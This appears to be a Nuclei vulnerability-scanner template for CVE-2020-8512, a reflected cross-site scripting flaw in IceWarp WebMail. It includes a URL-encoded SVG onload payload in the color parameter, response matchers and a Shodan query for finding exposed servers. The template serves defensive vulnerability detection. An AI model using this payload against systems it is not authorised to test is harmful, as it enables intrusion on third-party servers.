nuclei-templates/cves/2020/CVE-2020-8512.yaml

42 lines
1.2 KiB
YAML

id: CVE-2020-8512
info:
name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
author: pdteam,dwisiswant0
severity: medium
description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
reference:
- https://www.exploit-db.com/exploits/47988
- https://twitter.com/sagaryadav8742/status/1275170967527006208
- https://cxsecurity.com/issue/WLB-2020010205
- https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8512
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-8512
cwe-id: CWE-79
metadata:
shodan-query: title:"icewarp"
tags: edb,packetstorm,cve,cve2020,xss,icewarp
requests:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(document.domain)>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/09/02